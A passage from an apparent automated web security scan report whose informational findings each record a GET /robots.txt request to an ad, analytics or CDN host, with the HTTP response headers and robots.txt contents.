Date: Tue, 19 Jul 2011 20:18:03 GMT
Server: Apache/2.2.10 (Unix) modpath/0.4 PHP/5.2.6
Last-Modified: Tue, 14 Nov 2006 18:37:39 GMT
ETag: "800493-14d-42239502409df"
Accept-Ranges: bytes
Served-By: rebecca
Age: 1546
Cache-Control: max-age=2349
Via: HTTP/1.1 cache.boston.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet.
Expires: Tue, 19 Jul 2011 20:57:13 GMT
Content-Type: text/plain
Via: 1.0 rhv082185010000 (MII-APC/2.0)
x-mii-cache-hit: 1
Content-Length: 333
Connection: close

# this is a "configuration" file for web robots, so that we can
# make sure that these crawlers/robots/indexers do not follow links
# on our site to things like cgi scripts, which could cause some
# u
...[SNIP]...

26.23. http://cache.specificmedia.com/creative/blank.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache.specificmedia.com
Path:   /creative/blank.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cache.specificmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:21 GMT
Server: PWS/1.7.2.3
X-Px: rf-ht jfk-agg-n63 ( lax-agg-n46), ht lax-agg-n5.panthercdn.com
ETag: "ffdde9-1a-44ed7e3e1bdc0"
Cache-Control: max-age=604800
Expires: Tue, 26 Jul 2011 20:44:21 GMT
Age: 0
Content-Length: 26
Content-Type: text/plain
Last-Modified: Wed, 04 Jun 2008 14:17:35 GMT
Connection: close

User-agent: *
Disallow: /

26.24. http://cdn.stumble-upon.com/css/global_su.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.stumble-upon.com
Path:   /css/global_su.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.stumble-upon.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 31 May 2011 21:14:03 GMT
Content-Type: text/plain; charset=iso-8859-1
Date: Tue, 19 Jul 2011 14:28:26 GMT
Content-Length: 1962
Connection: close

Sitemap: http://stumbleupon.com/sitemap.blogA_index.xml
Sitemap: http://stumbleupon.com/sitemap.blogB_index.xml
Sitemap: http://stumbleupon.com/sitemap.review_index.xml
Sitemap: http://stumbleupon.com
...[SNIP]...

26.25. http://cdn.turn.com/server/ddc.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /server/ddc.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Cache-Control: private, no-cache, no-store, must-revalidate
Date: Tue, 19 Jul 2011 20:43:09 GMT
Content-Length: 47
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

26.26. http://cgi.ebay.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cgi.ebay.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cgi.ebay.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=ISO-8859-1
Content-Length: 1272
Date: Tue, 19 Jul 2011 18:36:24 GMT
Connection: keep-alive

### BEGIN FILE ###
#
# allow-all
#
#
# The use of robots or other automated means to access the eBay site
# without the express permission of eBay is strictly prohibited.
# Notwithstanding the foregoi
...[SNIP]...

26.27. http://cheetah.vizu.com/a.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cheetah.vizu.com
Path:   /a.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cheetah.vizu.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:23 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n29 ( iad-agg-n34), ht-d iad-agg-n34.panthercdn.com
ETag: "3c053-1a-8dc02bc0"
Cache-Control: max-age=604800
Expires: Sun, 24 Jul 2011 09:26:10 GMT
Age: 213493
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 14 Jul 2011 23:04:23 GMT
Connection: close

User-agent: *
Disallow: /

26.28. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 19 Jul 2011 14:28:38 GMT
Server: Cookie Matcher
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

26.29. http://creatives.as4x.tmcs.net/tmsandbox3a.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://creatives.as4x.tmcs.net
Path:   /tmsandbox3a.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: creatives.as4x.tmcs.net

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 14 Aug 2003 22:04:31 GMT
ETag: "22ffd3-87-3c4e1b86d79c0"
Accept-Ranges: bytes
Content-Length: 135
P3P: policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Pragma: no-cache
Content-Type: text/plain
Date: Tue, 19 Jul 2011 18:36:27 GMT
Connection: close

User-agent: *
Disallow: /event.ng/
Disallow: /html.ng/
Disallow: /js.ng/
Disallow: /click.ng/
Disallow: /image.ng/
Disallow: /ping.ng/

26.30. http://digg.com/ajax/tooltip/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /ajax/tooltip/submit

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: digg.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:31 GMT
Server: Apache
Last-Modified: Mon, 11 Jul 2011 21:43:10 GMT
Accept-Ranges: bytes
Content-Length: 599
Vary: Accept-Encoding
X-Digg-Time: D=267 (null)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Keep-Alive: timeout=5, max=9995
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /ad/*
Disallow: /ajax/*
Disallow: /error/*
Disallow: /onboard/*
Disallow: /saved
Disallow: /settings
Disallow: /settings/*
Disallow: /news/*/v/*
Disallow: /verification/*

User
...[SNIP]...

26.31. http://farecastcom.122.2o7.net/b/ss/farecastcom/1/H.15.1/s76965045684482  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://farecastcom.122.2o7.net
Path:   /b/ss/farecastcom/1/H.15.1/s76965045684482

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: farecastcom.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:00:29 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "e9e04-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www83
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.32. http://feeds.bbci.co.uk/news/rss.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=3573
Expires: Tue, 19 Jul 2011 15:24:44 GMT
Date: Tue, 19 Jul 2011 14:25:11 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

26.33. http://fonts.googleapis.com/css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fonts.googleapis.com
Path:   /css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fonts.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 19 Jul 2011 14:20:38 GMT
Expires: Tue, 19 Jul 2011 14:20:38 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

26.34. http://g-pixel.invitemedia.com/gmatcher  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://g-pixel.invitemedia.com
Path:   /gmatcher

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 19 Jul 2011 14:28:38 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

26.35. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1052447870/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1052447870/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 19 Jul 2011 12:24:04 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

26.36. http://ibegin.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ibegin.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ibegin.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Jul 2011 00:00:51 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 08 Oct 2010 14:12:24 GMT
ETag: "1400db-166-4921b99814200"
Accept-Ranges: bytes
Content-Length: 358
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /contact/
Disallow: /about/
Disallow: /blog/
Disallow: /weather/share
Disallow: /weather/xml
Disallow: /weather/removelocation.php
Disallow: /weather/setlocation.php
Disallow:
...[SNIP]...

26.37. http://in.getclicky.com/in.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.getclicky.com
Path:   /in.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: in.getclicky.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 12:25:25 GMT
Server: Apache
Last-Modified: Wed, 13 Jul 2011 23:34:26 GMT
ETag: "5e403d-1f-4a7fbdb606480"
Accept-Ranges: bytes
Content-Length: 31
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /stats/

26.38. http://l.addthiscdn.com/live/t00/250lo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.addthiscdn.com
Path:   /live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Jun 2011 11:39:23 GMT
ETag: "df8ab7-1b-4a51dabdf10c0"
Content-Type: text/plain; charset=UTF-8
Date: Tue, 19 Jul 2011 14:21:55 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *


26.39. http://metrics.boston.com/b/ss/nytbglobe/1/H.20.3/s81497499125071  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.boston.com
Path:   /b/ss/nytbglobe/1/H.20.3/s81497499125071

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.boston.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:15 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "1e9153-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www44
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.40. http://metrics.ticketmaster.com/b/ss/tm-usprod,tm-combinedusprod/1/H.22.1/s82794165948871  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.ticketmaster.com
Path:   /b/ss/tm-usprod,tm-combinedusprod/1/H.22.1/s82794165948871

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.ticketmaster.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:41 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "8c701-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www81
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.41. http://metrics.versionone.com/b/ss/vonenewprod/1/H.17/s66275241293478  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.versionone.com
Path:   /b/ss/vonenewprod/1/H.17/s66275241293478

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.versionone.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:22:37 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "2f4193-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www426
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.42. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 Mar 2009 16:14:11 GMT
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=77551296
Expires: Thu, 02 Jan 2014 04:26:46 GMT
Date: Tue, 19 Jul 2011 14:25:10 GMT
Connection: close

User-agent: *
Disallow: /

26.43. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/plain
Last-Modified: Fri, 24 Jun 2011 17:54:48 GMT
Accept-Ranges: bytes
ETag: "024edce9732cc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Tue, 19 Jul 2011 14:20:42 GMT
Connection: keep-alive
Content-Length: 44

# do not index
User-agent: *
Disallow: /

26.44. http://odb.outbrain.com/utils/ping.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/ping.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: odb.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"28-1306767303000"
Last-Modified: Mon, 30 May 2011 14:55:03 GMT
Content-Type: text/plain
Content-Length: 28
Date: Tue, 19 Jul 2011 20:44:13 GMT
Connection: close

User-agent: *
Disallow: /



26.45. http://pixel.invitemedia.com/admeld_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 19 Jul 2011 20:43:03 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

26.46. http://pixel.quantserve.com/seg/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /seg/r

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 20 Jul 2011 20:43:03 GMT
Content-Type: text/plain
Content-Length: 26
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: QS

User-agent: *
Disallow: /

26.47. http://profile.live.com/badge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profile.live.com
Path:   /badge

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: profile.live.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
X-Imf: f10a374d-3fda-4e40-9f79-c5561402fdf4
Set-Cookie: E=P:OfkUiDcUzog=:m3+o48khan8jv/61bPUUITy9k/QX5NvjkSrO8V/7so4=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: sc_clustbl_142=73dc7597b22d9205; domain=profile.live.com; expires=Thu, 18-Aug-2011 14:30:24 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: BL2XXXXXC668 V: 1 D: 7/13/2011
Date: Tue, 19 Jul 2011 14:30:23 GMT
Connection: close
Content-Length: 44

...User-agent: *
Disallow: /applications/

26.48. http://puma.vizu.com/cdn/00/00/21/04/smart_tag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://puma.vizu.com
Path:   /cdn/00/00/21/04/smart_tag.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: puma.vizu.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:21 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n5 ( iad-agg-n6), ht-d iad-agg-n6.panthercdn.com
ETag: "9c6e3-1a-8b2eaf40"
P3P: CP="DSP NID OTP UNR STP NON", policyref="/w3c/p3p.xml"
Cache-Control: max-age=604800
Expires: Mon, 25 Jul 2011 13:05:17 GMT
Age: 113944
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 09 Jun 2011 20:46:13 GMT
Connection: close

User-agent: *
Disallow: /

26.49. http://r.turn.com/server/pixel.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Tue, 19 Jul 2011 20:43:05 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

26.50. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rmedia.boston.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: Apache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Mon, 21 Jun 2010 19:32:33 GMT
ETag: "4000aa-60-5dbf7640"
Accept-Ranges: bytes
Content-Length: 96
Keep-Alive: timeout=300, max=105
Connection: close
Content-Type: text/plain

User-Agent: *
Sitemap: http://www.boston.com/Sitemap_index.xml
Disallow: /newsprojects/widgets/

26.51. http://rover.ebay.com/rover/1/711-53200-19255-0/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rover.ebay.com
Path:   /rover/1/711-53200-19255-0/1

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rover.ebay.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=ISO-8859-1
Content-Length: 810
Date: Tue, 19 Jul 2011 18:35:47 GMT
Connection: keep-alive

### BEGIN FILE ###
#
# allow-all
#
#
# The use of robots or other automated means to access the eBay site
# without the express permission of eBay is strictly prohibited.
# Notwithstanding the foregoi
...[SNIP]...

26.52. http://rt.legolas-media.com/lgrt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rt.legolas-media.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:08 GMT
Server: Apache
Last-Modified: Sun, 27 Mar 2011 17:04:21 GMT
ETag: "1ad0152-1b-49f79d177ef40"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /


26.53. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY7LQDIPC0AyoFcNoAAAEyBWzaAAAP  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing-cache.google.com
Path:   /safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY7LQDIPC0AyoFcNoAAAEyBWzaAAAP

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing-cache.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Fri, 10 Jun 2011 20:18:24 GMT
Date: Tue, 19 Jul 2011 14:28:16 GMT
Expires: Tue, 19 Jul 2011 14:28:16 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.54. http://safebrowsing.clients.google.com/safebrowsing/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Fri, 10 Jun 2011 20:18:24 GMT
Date: Tue, 19 Jul 2011 14:28:16 GMT
Expires: Tue, 19 Jul 2011 14:28:16 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.55. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 19 Jul 2011 14:28:35 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

26.56. http://srx.main.ebayrtm.com/rtm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://srx.main.ebayrtm.com
Path:   /rtm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: srx.main.ebayrtm.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=ISO-8859-1
Content-Length: 810
Date: Tue, 19 Jul 2011 18:36:21 GMT
Connection: keep-alive

### BEGIN FILE ###
#
# allow-all
#
#
# The use of robots or other automated means to access the eBay site
# without the express permission of eBay is strictly prohibited.
# Notwithstanding the foregoi
...[SNIP]...

26.57. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.30.145.199
X-Cnection: close
Date: Tue, 19 Jul 2011 18:37:21 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

26.58. http://stubhub-www.baynote.net/baynote/tags3/common  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stubhub-www.baynote.net
Path:   /baynote/tags3/common

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: stubhub-www.baynote.net

Response

HTTP/1.1 200 OK
Server: BNServer
Accept-Ranges: bytes
ETag: W/"216-1253825728000"
Last-Modified: Thu, 24 Sep 2009 20:55:28 GMT
Content-Type: text/plain
Content-Length: 216
Date: Tue, 19 Jul 2011 18:36:25 GMT
Connection: close

User-agent: *
Disallow: /baynote/
Disallow: /error400.html
Disallow: /error403.html
Disallow: /error404.html
Disallow: /error500.html
Disallow: /index.jsp
Disallow: /search/
Disallow: /socialsearch/
D
...[SNIP]...

26.59. http://stubhub.tt.omtrdc.net/m2/stubhub/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stubhub.tt.omtrdc.net
Path:   /m2/stubhub/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: stubhub.tt.omtrdc.net

Response

HTTP/1.1 200 OK
ETag: W/"25-1309299047000"
Accept-Ranges: bytes
Content-Length: 25
Date: Tue, 19 Jul 2011 18:36:23 GMT
Connection: close
Last-Modified: Tue, 28 Jun 2011 22:10:47 GMT
Server: Test & Target
Content-Type: text/plain

User-agent: *
Disallow: /

26.60. http://tag.admeld.com/ad/js/610/bostonglobe/728x90/bg_1064637_61606218  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/js/610/bostonglobe/728x90/bg_1064637_61606218

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Last-Modified: Mon, 18 Jul 2011 20:35:07 GMT
ETag: "db6026f-1a-4a85def4bf4c0"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Tue, 19 Jul 2011 20:42:43 GMT
Connection: close

User-agent: *
Disallow: /

26.61. http://themes.googleusercontent.com/font  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://themes.googleusercontent.com
Path:   /font

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: themes.googleusercontent.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 19 Jul 2011 14:20:42 GMT
Expires: Tue, 19 Jul 2011 14:20:42 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

26.62. http://umfcluj.ro/js/jquery.validate.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /js/jquery.validate.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: umfcluj.ro

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 18 May 2009 08:13:16 GMT
Accept-Ranges: bytes
ETag: "036d67e90d7c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:12:32 GMT
Connection: close
Content-Length: 86

User-Agent: *
Disallow: /css/
Disallow: /js/
Disallow: /WebResource.axd
Allow: /

26.63. http://wa.stubhub.com/b/ss/stubhub/1/H.22.1/s88119992504362  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wa.stubhub.com
Path:   /b/ss/stubhub/1/H.22.1/s88119992504362

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wa.stubhub.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:26 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "190236-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www290
Keep-Alive: timeout=15
